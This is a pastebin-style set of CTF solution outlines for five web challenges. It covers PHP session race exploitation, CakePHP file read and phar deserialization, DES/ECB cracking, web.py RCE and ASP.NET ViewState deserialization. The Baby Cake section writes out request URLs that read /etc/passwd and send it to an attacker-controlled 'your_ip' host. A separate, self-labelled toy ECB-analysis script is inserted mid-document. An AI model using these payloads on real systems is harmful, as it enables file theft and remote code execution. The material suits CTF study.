Untitled
a guest, Oct 21st, 2018
One Line PHP Challenge
Difficulty: ★★★★☆
Solved: 3 / 1816
Tag: PHP

Source Code
index.php
Solution
P.S. This is a default installation of PHP 7.2 + Apache on Ubuntu 18.04

Control part of the session file content via PHP_SESSION_UPLOAD_PROGRESS
Bypass session.upload_progress.cleanup = On by a race condition or a slow query
Control the prefix to be @<?php by chaining PHP wrappers
exp_for_php.py
Write Ups
TBD

Baby Cake
Difficulty: ★★★
Solved: 4 / 1816
Tag: Code Review, PHP, De-serialization

Source Code
index.php
Solution
Due to the implementation of CURLOPT_SAFE_UPLOAD in CakePHP's FormData.php, we can read arbitrary files!

# arbitrary file read, listen on port 12345 on your server
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@/etc/passwd

# arbitrary deserialization via the Monolog POP chain
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@phar://../tmp/cache/mycache/[your_ip]/[md5_of_url]/body.cache
exploit.phar
Write Ups
TBD

Oh My Raddit
Difficulty: ★7★
Solved: 2 / 1816
Tag: Observation, DES checksum, Crypto, Web

Source Code
app
Solution
Identify ECB mode from block frequency analysis
Infer block size = 8 from the ciphertext length
From the information above, DES is the reasonable real-world guess
The most common block is 3ca92540eb2d0a42 (always at the end of the ciphertext); we can guess it is the padding \x08\x08\x08\x08\x08\x08\x08\x08
Because of the parity checking in DES, we can reduce the keyspace from 26 (abcdefghijklmnopqrstuvwxyz) to 14 (acegikmoqsuwyz)
Break in 1 second with HashCat
Break in 10 minutes with single-threaded Python
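
The observations above (repeated blocks reveal ECB, ciphertext lengths reveal the block size, the most frequent trailing block is the full padding block, and DES ignores one bit per key byte) are the kind of checks worth running over your own encrypted tokens before an attacker does. The following is an added example, not code from the original write-up or from the challenge: it uses a constructed, insecure toy 8-byte block function and a constructed corpus of short query-string plaintexts so that the analysis runs offline; the toy key `toy-key!` and the sample plaintexts are assumptions, and the toy CBC variant is included only to contrast against ECB.

```python
"""Added example: ECB detection, block-size inference, padding-block
identification and the DES key-parity equivalence, run over a constructed
corpus.  The 'cipher' is a toy stand-in, not DES and not the challenge's."""
import os
from collections import Counter
from functools import reduce
from math import gcd

BLOCK = 8
KEY = b"toy-key!"  # constructed 8-byte key for the toy block function


def pkcs7_pad(data: bytes, block_size: int = BLOCK) -> bytes:
    n = block_size - (len(data) % block_size)
    return data + bytes([n]) * n


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # Constructed stand-in for a real 8-byte block cipher: a key-dependent
    # bijection on one block (XOR with the key, then byte reversal).  Not
    # secure; it only reproduces the structural property that matters here:
    # equal input blocks give equal output blocks under the same key.
    return bytes(b ^ k for b, k in zip(block, key))[::-1]


def toy_ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    padded = pkcs7_pad(plaintext)
    return b"".join(toy_encrypt_block(key, padded[i:i + BLOCK])
                    for i in range(0, len(padded), BLOCK))


def toy_cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Same toy block function in CBC mode with a random IV (prepended), for
    # contrast: chaining removes the repeated-block signature.
    padded = pkcs7_pad(plaintext)
    prev = os.urandom(BLOCK)
    out = [prev]
    for i in range(0, len(padded), BLOCK):
        mixed = bytes(p ^ c for p, c in zip(padded[i:i + BLOCK], prev))
        prev = toy_encrypt_block(key, mixed)
        out.append(prev)
    return b"".join(out)


def split_blocks(ct: bytes, block_size: int):
    return [ct[i:i + block_size] for i in range(0, len(ct), block_size)]


def infer_block_size(ciphertexts) -> int:
    # Block-mode ciphertexts are always a multiple of the block size, so the
    # gcd of all observed lengths is the candidate (8 -> DES/3DES/Blowfish
    # family, 16 -> AES).  It needs enough samples of varied length to be firm.
    return reduce(gcd, (len(c) for c in ciphertexts))


def repeated_block_ratio(ciphertexts, block_size: int) -> float:
    # Fraction of blocks in the corpus that duplicate another block.  With a
    # fresh IV per message (CBC/CTR) this stays near zero; under ECB identical
    # plaintext blocks collide and the ratio climbs.
    counts = Counter(b for ct in ciphertexts for b in split_blocks(ct, block_size))
    total = sum(counts.values())
    return (total - len(counts)) / total


def looks_like_ecb(ciphertexts, block_size: int, threshold: float = 0.05) -> bool:
    return repeated_block_ratio(ciphertexts, block_size) > threshold


def most_common_final_block(ciphertexts, block_size: int):
    # In ECB every message whose length is a multiple of the block size ends
    # in the same full padding block (\x08 * 8 under PKCS#7), so the most
    # frequent final block is a strong padding candidate.
    counts = Counter(split_blocks(ct, block_size)[-1] for ct in ciphertexts)
    return counts.most_common(1)[0]


def des_key_equivalence_classes(alphabet: bytes) -> bytes:
    # DES discards the low bit of every key byte (the parity bit), so two key
    # bytes that differ only in that bit select the same 56-bit key.  Group
    # the alphabet by the remaining 7 bits and keep one representative each.
    groups = {}
    for c in alphabet:
        groups[c >> 1] = c  # the later letter of a pair wins
    return bytes(sorted(groups.values()))


# Constructed sample corpus: short, URL-parameter-like plaintexts with shared
# prefixes, in the spirit of the challenge's encrypted query strings.
PLAINTEXTS = [b"id=%05d" % i for i in range(20)] + \
             [b"page=%02d&id=%05d" % (1 + i % 2, 100 + i) for i in range(10)]
ECB_SAMPLES = [toy_ecb_encrypt(KEY, p) for p in PLAINTEXTS]
CBC_SAMPLES = [toy_cbc_encrypt(KEY, p) for p in PLAINTEXTS]

if __name__ == "__main__":
    print("block size:", infer_block_size(ECB_SAMPLES))
    print("ECB repeated-block ratio:", round(repeated_block_ratio(ECB_SAMPLES, 8), 3))
    print("CBC repeated-block ratio:", round(repeated_block_ratio(CBC_SAMPLES, 8), 3))
    blk, n = most_common_final_block(ECB_SAMPLES, 8)
    print("most common final block:", blk.hex(), "seen", n, "times")
    print("is it the padding block?", blk == toy_encrypt_block(KEY, b"\x08" * 8))
    print("DES-effective lowercase key bytes:", des_key_equivalence_classes(b"abcdefghijklmnopqrstuvwxyz"))
```

The same functions apply unchanged to real ciphertexts: feed `infer_block_size` and `repeated_block_ratio` a few hundred tokens collected from your own application, and a ratio well above zero at block size 8 or 16 means the mode is ECB and should be replaced with an authenticated mode.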
Write Ups
TBD

Oh My Raddit v2
Difficulty: ★★
Solved: 10 / 1816
Tag: Web.py, SQL Injection to RCE

Source Code
app
Solution
Read the package version from requirements.txt

Remote Code Execution in the Web.py framework

exp.py

Write Ups
TBD

Why so Serials?
Difficulty: ★★★★
Solved: 1 / 1816
Tag: De-serialization, RCE, ASP.NET, View State

Source Code
index.php
Solution
Get the machineKey from web.config via Server-Side Includes (.shtml or .stm)
Exploit ASP.NET __VIEWSTATE with ysoserial.net
Write Ups
TBD